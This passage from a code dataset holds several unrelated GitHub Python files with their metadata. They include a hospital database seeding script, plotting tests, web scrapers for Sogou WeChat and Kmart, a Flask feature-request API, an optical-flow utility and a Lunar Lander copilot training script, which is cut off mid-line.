self.create_general_physician()\n optomotrist = self.create_optomotrist()\n\n # Create a patient (auto assigned to cheif)\n general_patient = self.create_general_patient()\n assert general_patient.pcp == chief\n\n # Create medication1 and medication2\n medication1 = self.create_medication1()\n medication2 = self.create_medication2()\n\n # Create interactions\n self.create_medication_interaction()\n\n self.create_many_nurses()\n self.create_many_surgeons()\n self.create_many_physicians()\n self.create_many_patients()\n \n # self.add_staff_to_patient()\n\n # Assign patient from COF to general\n general_patient.pcp = general_physician\n general_patient.save()\n\n # Get this patient in for consultation\n general_patient_visit = Consultation(\n physician=general_physician,\n patient=general_patient,\n date=datetime.now()\n )\n general_patient_visit.save()\n print(general_patient_visit)\n\n # Patient can also see opt, who is not primary\n opt_visit = Consultation(\n physician=optomotrist,\n patient=general_patient,\n date=datetime(2023, 8, 1)\n )\n print(opt_visit)\n\n # # Give patient a bed and room, make sure admitted works\n # bed_names = {\n # \"gcu-1A\": type(None), # Patient w/ no bed, before update this is null\n # \"gcu-2A\": datetime, # Moving patient to new bed, has admitted time\n # None: datetime, # Admitted time there from last, removing bed relation\n # }\n # for bed_name, admitted_type in bed_names.items():\n # assert isinstance(general_patient.admission_date, admitted_type)\n # bed = Bed.objects.get_bed_by_code(bed_name)\n # general_patient.bed = bed\n # general_patient.save()\n\n # Patient comes out in gcu-1A bed\n # general_patient.bed = Bed.objects.get_bed_by_code(\"gcu-1A\")\n 
general_patient.save()\n\n        call_command(\"runserver\")","repo_name":"matthew-f-bailey/dbmgmt","sub_path":"hospital/management/commands/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":18958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10318649770","text":"import numpy as np\n\nfrom holoviews.element import HeatMap, Image\n\nfrom .testplot import TestMPLPlot, mpl_renderer\n\n\nclass TestLayoutPlot(TestMPLPlot):\n\n    def test_heatmap_invert_axes(self):\n        arr = np.array([[0, 1, 2], [3, 4, 5]])\n        hm = HeatMap(Image(arr)).opts(plot=dict(invert_axes=True))\n        plot = mpl_renderer.get_plot(hm)\n        artist = plot.handles['artist']\n        self.assertEqual(artist.get_array().data, arr.T[::-1, ::-1])\n        self.assertEqual(artist.get_extent(), (0, 2, 0, 3))\n","repo_name":"SebastianRiedel/holoviews","sub_path":"tests/plotting/matplotlib/testheatmapplot.py","file_name":"testheatmapplot.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"23038424972","text":"#2675 String repetition\n\nn = int(input())\nfor i in range(n):\n    li = list(input().split())\n    repeat = int(li[0])\n    temp = \"\"\n    for j in li[1]:\n        for _ in range(repeat):\n            temp += j\n    \n    print(temp)\n","repo_name":"LKM0222/BackJunCoding","sub_path":"Problem/Solution/2675.strLoop.py","file_name":"2675.strLoop.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72978974807","text":"import re\r\nfrom PIL import Image\r\nimport codecs\r\nimport time\r\nimport download_img\r\nfrom bs4 import BeautifulSoup\r\n\r\nfrom redis_tool.redis_url import REDIS_URL\r\nfrom check_QR import CHECK_QRCORE\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions\r\nfrom selenium.webdriver.common.by import By\r\n\r\nimport logging\r\nlogging.basicConfig(level = logging.DEBUG,filename='sogou_weixin.log',format = '%(asctime)s - %(name)s - %(funcName)s - %(levelname)s - %(message)s')\r\nlogging.basicConfig(level = logging.INFO,filename='sogou_weixin.log',format = '%(asctime)s - %(name)s - %(funcName)s - %(levelname)s - %(message)s')\r\nlogger = logging.getLogger(__name__)\r\nlogger.setLevel(logging.DEBUG)\r\n\r\ndef do():\r\n    redis_url = REDIS_URL() # redis-based URL dedup\r\n    check_qrcore = CHECK_QRCORE(redis_url) # QR check\r\n\r\n    url = 'http://weixin.sogou.com/'\r\n\r\n    keyword = '入群 聊天' # the actual search query, kept in Chinese (roughly \"join group / chat\")\r\n\r\n    delay_time = 1 # delay between actions\r\n\r\n    opt = webdriver.ChromeOptions()\r\n    opt.binary_location = r'D:\\Google\\Chrome\\Application\\chrome.exe'\r\n    opt.headless = True # run headless (no GUI)\r\n\r\n    driver = webdriver.Chrome(options=opt, executable_path=r'D:\\Anaconda3\\Scripts\\chromedriver.exe')\r\n    driver.implicitly_wait(10)\r\n    driver.set_window_size(1280, 800)\r\n    driver.get(url)\r\n\r\n    # browser click sequence\r\n    driver.find_element_by_xpath('//*[@id=\"query\"]').send_keys(keyword) # enter the search keyword\r\n    driver.find_element_by_xpath('//*[@id=\"searchForm\"]/div/input[3]').click() # click \"search articles\"\r\n    time.sleep(5)\r\n    driver.find_element_by_xpath('//*[@id=\"tool_show\"]/a').click() # click \"search tools\"\r\n    time.sleep(1)\r\n    driver.find_element_by_xpath('//*[@id=\"time\"]').click() # click \"all time\"\r\n    time.sleep(1)\r\n    # driver.find_element_by_xpath('//*[@id=\"tool\"]/span[1]/div/a[3]').click() # click \"past week\"\r\n    driver.find_element_by_xpath('//*[@id=\"tool\"]/span[1]/div/a[2]').click() # click \"past day\"\r\n\r\n    for 
i in range(0,100):\r\n        logger.info('{:-^20}'.format('Page %d' % (i + 1)))\r\n        time.sleep(5)\r\n\r\n        bs = BeautifulSoup(driver.page_source, 'lxml')\r\n\r\n        ll = bs.find(class_='news-list').find_all('li', recursive=False)\r\n        # logger.debug(ll)\r\n        # logger.debug(len(ll))\r\n        for l in ll:\r\n            _href = l.find(class_='txt-box').find('h3').find('a').attrs['href']\r\n\r\n            if not redis_url.ismember_url_hash(url=_href):\r\n                redis_url.add_url_hash(url=_href) # mark as seen\r\n                logger.info('%s-%s'%('collected',_href))\r\n                try:\r\n                    name_l = download_img.download_img(_href)\r\n                    check_qrcore.check_copy(name_l)\r\n                except Exception as ex:\r\n                    logger.error('%s-%s' % (_href, ex))\r\n            else:\r\n                logger.info('%s-%s'%('duplicate',_href))\r\n\r\n        # wait for the next-page button, then click it\r\n        try:\r\n            WebDriverWait(driver, 10, 0.5).until(\r\n                expected_conditions.presence_of_element_located((By.XPATH, '//*[@id=\"sogou_next\"]')))\r\n            driver.find_element_by_xpath('//*[@id=\"sogou_next\"]').click()\r\n        except Exception as ex:\r\n            logger.error(ex)\r\n            break # break out of the loop\r\n\r\n\r\n    time.sleep(10)\r\n    driver.save_screenshot('screenshot.png')\r\n    logger.info('%s finished running!' % (__file__))\r\n\r\nif __name__ == '__main__':\r\n    do()","repo_name":"lcx1995/weixin_group_spider","sub_path":"sogou_weixin.py","file_name":"sogou_weixin.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6857230316","text":"import json\nimport uuid\nimport datetime\n\nfrom flask import Flask, render_template, request, abort\nfrom werkzeug.exceptions import BadRequest\n\nfrom models import db, Feature\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///../test.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb.init_app(app)\n\n\n@app.route(\"/\")\ndef index():\n    return render_template(\"index.html\")\n\n\n@app.route(\"/feature-request\")\ndef feature_request():\n    return render_template(\"feature-request.html\")\n\n\n@app.route(\"/api/v1/feature\", methods=[\"GET\", \"POST\"])\n@app.route(\"/api/v1/feature/<feature_id>\", methods=[\"GET\", \"PUT\", \"DELETE\"])\ndef feature_api_endpoint(feature_id=None):\n    \"\"\" REST API endpoint for AJAX \"\"\"\n\n    if request.method == \"GET\":\n        if feature_id:\n            feature = get_feature_by_id(feature_id)\n            return query_to_json([feature])\n        else:\n            features = Feature.query.all()\n            return query_to_json(features)\n\n    if request.method == \"POST\":\n        feature = parse_feature(request)\n        reorder_client_priorities(feature)\n        save_feature_request(feature)\n        return json.dumps({'status': 'success'})\n\n    if request.method == \"PUT\":\n        updates = parse_feature(request)\n        reorder_client_priorities(updates)\n        feature = get_feature_by_id(feature_id)\n        for key, val in updates.items():\n            setattr(feature, key, val)\n        db.session.commit()\n        return json.dumps({'status': 'success'})\n\n    if request.method == \"DELETE\":\n        feature = get_feature_by_id(feature_id)\n        db.session.delete(feature)\n        db.session.commit()\n        return json.dumps({'status': 'success'})\n\n\n#################\n# Helpers\n#################\n\ndef get_feature_by_id(feature_id):\n    \"\"\"\n    makes sure a feature id is supplied and returns a feature object\n    :param feature_id: a feature id as a string\n    :return: a feature class model object\n    \"\"\"\n    if not feature_id:\n        abort(400, 'feature id required')\n    feature_id = uuid.UUID(feature_id)\n    feature = Feature.query.get(feature_id)\n    if not feature:\n        abort(400, \"couldn't find the requested id\")\n    return feature\n\n\ndef query_to_json(query):\n    \"\"\"\n    turns a 
sqlalchemy query object into a json string\n :param query: sqlalchemy object\n \"\"\"\n features = []\n for feature in query:\n features.append({\n 'id': str(feature.id),\n 'title': feature.title,\n 'description': feature.description,\n 'client': feature.client,\n 'client_priority': feature.client_priority,\n 'target_date': str(feature.target_date),\n 'product_area': feature.product_area\n })\n return json.dumps(features)\n\n\ndef parse_feature(request):\n \"\"\"\n Check data is valid json and turn the date field\n into a python date object and priority into an int\n :param request: a flask request object\n :return: feature dict\n \"\"\"\n try:\n feature = request.get_json()\n if not feature:\n raise BadRequest\n except BadRequest:\n abort(400, 'invalid json')\n required_fields = [\n 'title',\n 'description',\n 'client',\n 'client_priority',\n 'target_date',\n 'product_area'\n ]\n for field in required_fields:\n if not feature.get(field):\n abort(400, 'whoops, \"' + field + '\" is required')\n feature['target_date'] = datetime.datetime.strptime(feature['target_date'], '%Y-%m-%d').date()\n feature['client_priority'] = int(feature['client_priority'])\n return feature\n\n\ndef reorder_client_priorities(feature):\n \"\"\"\n Reorders client priorities within the database if the given feature\n has a client_id that conflicts with an existing one.\n :param feature: a feature as a dict\n \"\"\"\n client_features = Feature.query.filter_by(client=feature['client'])\n reorder = False\n priority_list = []\n for i in client_features:\n priority_list.append(i.client_priority)\n if i.client_priority == feature['client_priority']:\n reorder = True\n priority = feature['client_priority']\n if reorder:\n for i in client_features:\n if i.client_priority >= priority:\n i.client_priority += 1\n\n db.session.commit()\n\n\ndef save_feature_request(feature):\n \"\"\"\n Saves a feature dictionary into the database\n :param feature: a dictionary of feature request data\n \"\"\"\n db.session.add(Feature(\n title=feature.get('title'),\n description=feature.get('description'),\n client=feature.get('client'),\n client_priority=feature.get('client_priority'),\n target_date=feature.get('target_date'),\n product_area=feature.get('product_area')\n ))\n db.session.commit()\n\n\ndef create_db():\n \"\"\" Helper to create a local test database \"\"\"\n new_app = Flask(__name__)\n new_app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///../test.db'\n new_app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n db.init_app(new_app)\n db.create_all(app=new_app)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","repo_name":"santeyio/feature-request-app","sub_path":"featurerequests.py","file_name":"featurerequests.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14551235478","text":"class Car:\r\n\r\n def __init__(self,make,model,year):\r\n self.make=make\r\n self.model=model\r\n self.year=year\r\n self.odometer=20\r\n\r\n def about_car(self):\r\n data=f\"{self.make} {self.model} {self.year}\"\r\n return data.title()\r\n def reading(self):\r\n print(f\"{self.odometer} miles on it\")\r\n def update_reading(self,miles):\r\n if miles>=self.odometer:\r\n self.odometer=miles\r\n else:\r\n print(\"you cant roll back reading\")\r\n def incr_reading(self,miles):\r\n 
self.odometer+=miles\r\n\r\n\r\ncar1=Car(\"swift\",\"dezire\",2020)\r\ncar2=Car(\"tata\",\"nexon\",2017)\r\ncar3=Car(\"kia\",\"centuro\",2018)\r\ncar4=Car(\"tata\",\"indica\",2014)\r\nprint(car1.about_car())\r\ncar1.reading()\r\nprint(car2.about_car())\r\ncar2.odometer=10\r\ncar2.reading()\r\nprint(car3.about_car())\r\ncar3.update_reading(55)\r\ncar3.reading()\r\nprint(car4.about_car())\r\ncar4.incr_reading(20)\r\ncar4.reading()","repo_name":"vijaypathem/python","sub_path":"pythpn pfiles2/car_class.py","file_name":"car_class.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70103655767","text":"import sys\nfrom logging import DEBUG, INFO, StreamHandler, getLogger\n\nfrom .config import ConfigParser\n\n\ndef build_logger(config, debug=False):\n    try:\n        config = config['logger']\n    except (KeyError, TypeError):\n        config = ConfigParser(default_sections=('logger',))\n        config = config['logger']\n\n    logger = getLogger('sparpy')\n    logger.addHandler(StreamHandler(stream=sys.stdout))\n    if debug:\n        logger.setLevel(DEBUG)\n    else:\n        logger.setLevel(config.getint('level', fallback=INFO))\n\n    return logger\n","repo_name":"alfred82santa/sparpy","sub_path":"sparpy/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"21590613258","text":"account_balance = 0\npurchase_history = []\n# it seems there is no way around globals here; otherwise a second call will not show the balance and purchase history\ndef my_banking():\n    global account_balance\n    global purchase_history\n\n\n    print('1. пополнение счета')\n    print('2. покупка')\n    print('3. история покупок')\n    print('4. баланс счета')\n    print('5. 
выход')\r\n\r\n    choice = input('Выберите пункт меню: ')\r\n\r\n    while choice != '5':\r\n\r\n        if choice == '1':\r\n            account_balance += int(input('Введите сумму для пополнения: '))\r\n        elif choice == '2':\r\n            purchase = int(input('Введите сумму покупки: '))\r\n            if purchase <= account_balance:\r\n                purchase_history.append((input('Введите название покупки: '), purchase))\r\n                account_balance -= purchase\r\n        elif choice == '3':\r\n            print(purchase_history)\r\n        elif choice == '4':\r\n            print(f'Баланс счета = {account_balance}')\r\n        elif choice == '5':\r\n            return\r\n        else:\r\n            print('Неверный пункт меню')\r\n\r\n        choice = input('Выберите пункт меню: ')","repo_name":"Mikhail-RnD/nu_lessons_5","sub_path":"bank_account.py","file_name":"bank_account.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36821476476","text":"import csv\n\nclass CSVReader:\n\n    def __init__(self):\n        pass\n\n\n    def as_matrix(self, filename, inc_headers=False):\n        data = []\n        with open(filename, 'rU') as file:\n            reader = csv.reader(file, delimiter=',', quotechar='|')\n            data = [row for row in reader]\n\n        return data\n\n\n    def as_dict(self, filename, inc_headers=False):\n        with open(filename, 'rU') as file:\n            reader = csv.reader(file, delimiter=',', quotechar='|')\n            headers = next(reader)\n\n            records = []\n            for row in reader:\n                record = {}\n                for i in range(len(headers)):\n                    record[headers[i]] = row[i]\n\n                records.append(record)\n\n\n        if inc_headers:\n            records = [headers] + records\n\n        return records\n\n\n    def headers(self):\n        return self.data()[0]","repo_name":"robinrob/csv","sub_path":"csv_reader.py","file_name":"csv_reader.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2605437916","text":"from db import *\nimport random, string\n\ndef gen_key():\n\tkey = ''.join(random.choices(string.ascii_letters + string.digits, k=7))\n\treturn key\n\ndef datetime_range(start, end, delta):\n\tcurrent = start\n\ttimes = [str(current)]\n\twhile current < end:\n\t\t\tcurrent += delta\n\t\t\ttimes.append(str(current))\n\n\treturn times\n\n\n\n","repo_name":"JMMFL/when-works","sub_path":"api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30673599840","text":"import torch\r\nimport copy\r\nimport numpy as np\r\nimport cv2\r\nfrom torch import from_numpy, transpose\r\nfrom torch.autograd import Variable\r\nfrom torchvision import transforms\r\nfrom torchvision.utils import save_image\r\n\r\nfrom dataset import get_loader\r\nfrom utils import reformat\r\nfrom configuration import *\r\n\r\n\r\ndef warp_flow(img, flow):\r\n    img = np.float32(reformat(img))\r\n    h, w = flow.shape[:2]\r\n    flow = -flow\r\n    flow[:,:,0] += np.arange(w)\r\n    flow[:,:,1] += np.arange(h)[:,np.newaxis]\r\n    res = cv2.remap(img, flow, None, cv2.INTER_LINEAR)\r\n    # res = cv2.cvtColor(res, cv2.COLOR_BGR2RGB)\r\n    return res\r\n\r\n\r\ndef array_to_torch(x):\r\n    \"\"\" input: np array of shape h, w, 3\r\n        output: pytorch tensor of shape 1, 3, h, w \"\"\"\r\n    x = cv2.cvtColor(x, cv2.COLOR_BGR2RGB)\r\n    x = np.array([x])\r\n    x = from_numpy(x)\r\n    x = transpose(x, 1,3)\r\n    x = transpose(x, 2,3)\r\n    x = x.div_(255.0)\r\n    return x\r\n\r\n\r\ndef confidence_mask(f1, f2, gpu=True):\r\n    rgb_f, flow_f = opticalflow(f1, f2)\r\n    rgb_b, flow_b = opticalflow(f2, f1)\r\n    f1_w_w = warp_flow(f1, flow_f + flow_b)\r\n    
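# Forward-backward consistency check (the usual occlusion heuristic): warping\r\n    # f1 by the composed forward + backward flow should roughly reproduce f1\r\n    # wherever the flow is reliable; a large round-trip error marks occlusion.\r\n    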
f1_w_w = array_to_torch(f1_w_w)\r\n if gpu:\r\n f1_w_w = f1_w_w.to(device=0)\r\n \r\n w_w = torch.norm(f1 - f1_w_w, dim=1)**2\r\n # Parameters to be adjusted\r\n occlusion_mask = (w_w < 0.001*(torch.norm(f1, dim=1)**2 +\r\n torch.norm(f1_w_w, dim=1)**2))# - 0.005)\r\n occlusion_mask = occlusion_mask.type('torch.FloatTensor')\r\n return occlusion_mask\r\n\r\n\r\n# input is numpy image array\r\ndef opticalflow(img1, img2):\r\n b, c, h, w = img1.shape\r\n # examine(img1, 'img1 before reformat')\r\n\r\n img1 = np.float32(reformat(img1))\r\n img2 = np.float32(reformat(img2))\r\n # examine(img1, 'img1 after reformat')\r\n\r\n prev = cv2.cvtColor(img1, cv2.COLOR_RGB2GRAY)\r\n nxt = cv2.cvtColor(img2, cv2.COLOR_RGB2GRAY)\r\n # examine(prev, 'prev = img1 in grayscale')\r\n\r\n flow = cv2.calcOpticalFlowFarneback(prev, nxt, flow=None,\r\n pyr_scale=0.5, levels=3, # wb 1?\r\n winsize=15, iterations=3,# wb 2?\r\n poly_n=5, poly_sigma=1.2,# wb 1.1?\r\n flags=0)\r\n # examine(flow, 'flow:')\r\n\r\n hsv = np.zeros_like(img1, np.uint8)\r\n hsv[:, :, 1] = 255\r\n mag, ang = cv2.cartToPolar(flow[...,0], flow[...,1])\r\n hsv[...,0] = ang*180/np.pi/2\r\n hsv[...,2] = cv2.normalize(mag,None,0,255,cv2.NORM_MINMAX)\r\n # examine(hsv, 'final hsv:')\r\n\r\n rgb = cv2.cvtColor(hsv,cv2.COLOR_HSV2RGB)\r\n rgb = np.float32(rgb)\r\n rgb = array_to_torch(rgb)\r\n # examine(rgb, 'rgb final')\r\n return rgb, flow\r\n\r\n\r\ndef examine(x, sentence):\r\n print('***********')\r\n print(sentence)\r\n print(x.shape, x.dtype)\r\n print(x.min(), x.max(), x.mean())\r\n\r\n\r\nif __name__ == '__main__':\r\n data_path = VIDEO_PATH \r\n img_shape = (640, 360)\r\n videonames = ['9_17_s.mp4']\r\n transform = transforms.ToTensor()\r\n loader = get_loader(1, data_path, img_shape, transform, video_list=videonames, frame_nb=20, shuffle=False)\r\n t = Transfer(100,\r\n VIDEO_PATH,\r\n './examples/style_img/candy.jpg',\r\n '/home/{}/.torch/models/vgg19-dcbb9e9d.pth'.format(USER),\r\n 1e-4,\r\n 2e-1, 1e0, 0, 0,\r\n gpu=GPU)\r\n \r\n t.style_net.load_state_dict(torch.load('models/state_dict_STARWORKING_contentandstyle.pth', map_location='cpu'))\r\n \r\n for idx, frames in enumerate(loader):\r\n for i in range(5,7):\r\n print(i)\r\n print(len(frames))\r\n f1, f2 = copy.deepcopy((frames[i-1], frames[i]))\r\n\r\n # Collect optical flow from f1 to f2\r\n rgb, flow = opticalflow(f1, f2)\r\n examine(rgb, 'rgb')\r\n examine(flow, 'flow')\r\n # Warp f1 to f2\r\n f1_w = warp_flow(f1, flow)\r\n f1_w = array_to_torch(f1_w)\r\n\r\n # Compute occlusion mask\r\n occlusion_mask = confidence_mask(f1, f2, GPU)\r\n\r\n # Transfer style to f1, f2, and warp f1 stylized using f1 -> f2 optical flow\r\n f1_trans = Variable(f1, requires_grad=True)\r\n f2_trans = Variable(f2, requires_grad=True)\r\n f1_trans, _ = t.style_net(Variable(f1, requires_grad=True))\r\n f2_trans, _ = t.style_net(Variable(f2, requires_grad=True))\r\n f1_trans = 0.5 * (f1_trans + 1)\r\n f2_trans = 0.5 * (f2_trans + 1)\r\n f1_trans_w = warp_flow(f1_trans, flow)\r\n f1_trans_w = array_to_torch(f1_trans_w)\r\n\r\n # Save images for analysis.\r\n save_image(f1, 'tmp/{}_frame1.jpg'.format(i))\r\n save_image(f2, 'tmp/{}_frame2.jpg'.format(i))\r\n save_image(f1_w, 'tmp/{}_frame1warpedinto2.jpg'.format(i))\r\n save_image(f1_trans, 'tmp/{}_trans_frame1.jpg'.format(i))\r\n save_image(f2_trans, 'tmp/{}_trans_frame2.jpg'.format(i))\r\n save_image(f1_trans_w, 'tmp/{}_trans_frame1warpedinto2.jpg'.format(i))\r\n save_image(rgb, 'tmp/{}_rgb.jpg'.format(i))\r\n save_image(occlusion_mask, 
'tmp/{}_occlusion.jpg'.format(i))\r\n","repo_name":"TanguyJeanneau/white-mirror","sub_path":"src/pkg/opticalflow.py","file_name":"opticalflow.py","file_ext":"py","file_size_in_byte":5241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16641128847","text":"from bs4 import BeautifulSoup\nfrom urllib2 import urlopen\nfrom time import sleep # be nice\n \nBASE_URL = \"http://www.kmart.com\"\ncount=0\n \ndef make_soup(url):\n html = urlopen(url).read()\n return BeautifulSoup(html, 'html.parser')\n \ndef get_category_links(section_url):\n soup = make_soup(section_url)\n #boccat=soup.findAll('li',{'class':' gnf_nav_depth1_item gnf_dept_tree_item'})\n boccat = soup.findAll(\"li\", \" gnf_nav_depth3_item\")\n file=open(\"newfile.txt\", \"a\")\n \n category_links=[]\n for dd in boccat:\n temp= dd.find('a')\n if temp is not None:\n temp2=BASE_URL+dd.find('a')['href']\n file.write(temp2+'\\n')\n with open('newfile.txt') as f:\n for line in f:\n category_links.append(line)\n return category_links\n \n \ndef get_products(category_url):\n global count\n soup = make_soup(category_url)\n file=open(\"data.txt\", \"a\")\n #print soup\n boccat = soup.findAll(\"div\", \"cardProdTitle\")\n for prod in boccat:\n temp=prod.find('a')\n if temp is not None:\n link=BASE_URL+prod.find('a')['href']\n title=prod.find('a')['title']\n count=count+1\n file.write(str(count)+ \"\\t\"+ title.encode('utf8')+ \"\\t\"+ link.encode('utf8')+ '\\n')\n #file.write(link.encode('utf8') + '\\n\\n')\n #title2=encode(title)\n #link2=encode(link)\n #file.write(title2+ \"\\n\")\n #file.write(link2+\"\\n\\n\")\n \n \nif __name__ == '__main__':\n section = (\"http://www.kmart.com/appliances/b-20002\")\n\t\n \n \n categories = get_category_links(section)\n for category in categories:\n sub_category_links=get_category_links(category)\n for sub in sub_category_links:\n sub2_cat=get_category_links(sub)\n for sub2 in sub2_cat:\n #print sub2\n get_products(sub2)\n sleep(1)\n \n","repo_name":"harishabhishek/D-buggers","sub_path":"webScrapingKmartAppliances.py","file_name":"webScrapingKmartAppliances.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"4877484465","text":"from __future__ import division\nimport pickle\nimport random\nimport os\nimport math\nimport types\nimport uuid\nimport time\nfrom copy import copy\nfrom collections import defaultdict, Counter\n\nimport numpy as np\nimport gym\nfrom gym import spaces, wrappers\nfrom gym.envs.registration import register\nfrom envs import LunarLanderEmpowerment, LunarLander\nimport cloudpickle\nfrom policies import FullPilotPolicy, LaggyPilotPolicy, NoopPilotPolicy, NoisyPilotPolicy, SensorPilotPolicy, CoPilotPolicy\n\nimport tensorflow as tf\n\nfrom baselines import logger\nfrom baselines.common.schedules import LinearSchedule\nfrom baselines import deepq\nfrom baselines.common import models\nfrom baselines.deepq.replay_buffer import ReplayBuffer, PrioritizedReplayBuffer\nfrom baselines.deepq.deepq import ActWrapper\n\nimport doodad as dd\nimport doodad.mount as mount\nimport doodad.easy_sweep.launcher as launcher\nimport multiprocessing\nfrom doodad.easy_sweep.hyper_sweep import run_sweep_doodad\n\nfrom experiment_utils import config\nfrom experiment_utils.utils import query_yes_no\n\nfrom baselines.common.tf_util import make_session\n\nfrom matplotlib import pyplot as plt\nimport argparse\nfrom utils.env_utils import *\nfrom 
datetime import datetime\n\nEXP_NAME = \"CopilotTraining\"\n\ndef str_of_config(pilot_tol, pilot_type):\n return \"{'pilot_type': '%s', 'pilot_tol': %s}\" % (pilot_type, pilot_tol)\n\n\ndef run_ep(policy, env, max_ep_len, render=False, pilot_is_human=False):\n obs = env.reset()\n done = False\n totalr = 0.\n trajectory = None\n actions = []\n for step_idx in range(max_ep_len + 1):\n if done:\n trajectory = info['trajectory']\n break\n action = policy.step(obs[None, :])\n obs, r, done, info = env.step(action)\n actions.append(action)\n if render:\n env.render()\n totalr += r\n outcome = r if r % 100 == 0 else 0\n return totalr, outcome, trajectory, actions\n\n\ndef run_ep_copilot(policy, env, max_ep_len, pilot, pilot_tol, render=False, pilot_is_human=False):\n obs = env.reset()\n done = False\n totalr = 0.\n trajectory = None\n actions = []\n pilot_actions = np.zeros((env.num_concat * env.act_dim))\n for step_idx in range(max_ep_len + 1):\n if done:\n trajectory = info['trajectory']\n break\n action, pilot_actions = policy.step(obs[None, :], pilot, pilot_tol, pilot_actions)\n obs, r, done, info = env.step(action)\n actions.append(action)\n if render:\n env.render()\n totalr += r\n outcome = r if r % 100 == 0 else 0\n return totalr, outcome, trajectory, actions\n\n\ndef run_experiment(empowerment, exp_title, seed):\n now = datetime.now()\n\n random.seed(seed)\n np.random.seed(seed)\n tf.set_random_seed(seed)\n base_dir = os.path.join(config.DOCKER_MOUNT_DIR, EXP_NAME)\n# base_dir = os.getcwd() + '/data/' + exp_title + now.strftime(\"%m-%d-%Y-%H-%M-%S\") + \"_\" + empowerment #\n logger.configure(dir=base_dir, format_strs=['stdout', 'log', 'csv', 'tensorboard'])\n\n f = open(base_dir + \"/config.txt\", \"w\")\n f.write(\"Empowerment: {}\\n\".format(empowerment))\n f.write(\"Num concat: 20\\n\")\n f.write(\"Seed: {}\\n\".format(seed))\n f.write(\"No scale by height\\n\")\n f.write(\"Keep main engine from pilot\")\n f.close()\n\n max_ep_len = 1000\n n_training_episodes = 500\n\n env = LunarLanderEmpowerment(empowerment=0.0, ac_continuous=False)\n\n max_timesteps = max_ep_len * n_training_episodes\n full_pilot_policy = FullPilotPolicy(base_dir)\n full_pilot_policy.learn(env, max_timesteps)\n laggy_pilot_policy = LaggyPilotPolicy(base_dir, full_policy=full_pilot_policy.policy)\n noisy_pilot_policy = NoisyPilotPolicy(base_dir, full_policy=full_pilot_policy.policy)\n noop_pilot_policy = NoopPilotPolicy(base_dir, full_policy=full_pilot_policy.policy)\n sensor_pilot_policy = SensorPilotPolicy(base_dir, full_policy=full_pilot_policy.policy)\n sim_pilots = [full_pilot_policy, laggy_pilot_policy, noisy_pilot_policy, noop_pilot_policy, sensor_pilot_policy]\n\n pilot_names = ['full', 'laggy', 'noisy', 'noop', 'sensor']\n n_eval_eps = 100\n\n pilot_evals = [\n list(zip(*[run_ep(sim_policy, env, render=False, max_ep_len=max_ep_len) for _ in\n range(n_eval_eps)])) for\n sim_policy in sim_pilots]\n\n mean_rewards = [np.mean(pilot_eval[0]) for pilot_eval in pilot_evals]\n outcome_distrns = [Counter(pilot_eval[1]) for pilot_eval in pilot_evals]\n\n f = open(base_dir + \"/base.txt\", \"w\")\n f.write('\\n'.join([str(x) for x in zip(pilot_names, mean_rewards, outcome_distrns)]))\n f.close()\n\n pilot_tol_of_id = {\n 'noop': 0,\n 'laggy': 0.7,\n 'noisy': 0.3,\n 'sensor': 0.1\n }\n\n copilot_of_training_pilot = {}\n\n for training_pilot_id, training_pilot_tol in pilot_tol_of_id.items():\n training_pilot_policy = eval('%s_pilot_policy' % training_pilot_id)\n config_kwargs = {\n 'pilot_policy': 
training_pilot_policy,\n 'pilot_tol': training_pilot_tol,\n 'reuse': True,\n 'copilot_scope': 'co_deepq_' + training_pilot_id\n }\n print(training_pilot_id)\n co_env = LunarLanderEmpowerment(empowerment=empowerment, ac_continuous=False, **config_kwargs)\n copilot_policy = CoPilotPolicy(base_dir)\n copilot_policy.learn(co_env, max_timesteps=max_ep_len * n_training_episodes, **config_kwargs)\n copilot_of_training_pilot[training_pilot_id] = copilot_policy\n\n cross_evals={}\n\n for training_pilot_id, training_pilot_tol in pilot_tol_of_id.items():\n # load pretrained copilot\n training_pilot_policy = eval('%s_pilot_policy' % training_pilot_id)\n config_kwargs = {\n 'pilot_policy': training_pilot_policy,\n 'pilot_tol': training_pilot_tol,\n 'reuse': True\n }\n\n # evaluate copilot with different pilots\n for eval_pilot_id, eval_pilot_tol in pilot_tol_of_id.items():\n eval_pilot_policy = eval('%s_pilot_policy' % eval_pilot_id)\n copilot_policy = copilot_of_training_pilot[training_pilot_id]\n\n co_env_eval = LunarLanderEmpowerment(empowerment=0, ac_continuous=False, 